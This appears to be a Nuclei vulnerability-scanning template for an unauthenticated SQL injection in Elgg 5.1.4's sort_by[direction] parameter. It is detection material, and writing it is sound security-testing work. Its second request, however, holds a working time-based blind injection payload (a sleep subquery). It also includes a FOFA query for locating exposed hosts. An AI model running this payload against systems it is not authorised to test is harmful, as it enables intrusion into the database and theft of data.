49 lines
1.5 KiB
YAML
49 lines
1.5 KiB
YAML
id: elgg-sqli
|
|
|
|
info:
|
|
name: Elgg 5.1.4 - SQL Injection
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
|
|
reference:
|
|
- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
|
|
- https://github.com/Elgg/Elgg
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: elgg
|
|
product: elgg
|
|
fofa-query: icon_hash="413602919"
|
|
tags: elgg,sqli
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body,"elgg.js")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout 20s
|
|
GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration >= 6'
|
|
- 'contains(body,"All members")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 490a00463044022030d8c3dbfc3a5a3e7bfb9ad41f142260078d81ec23eed193e8108a42e5d6a8ae022050bca5d9818b5e0b656a96c77fb146aef53a16d35160004229b3ed8778e07c2b:922c64590222798bb761d5b6d8e72950 |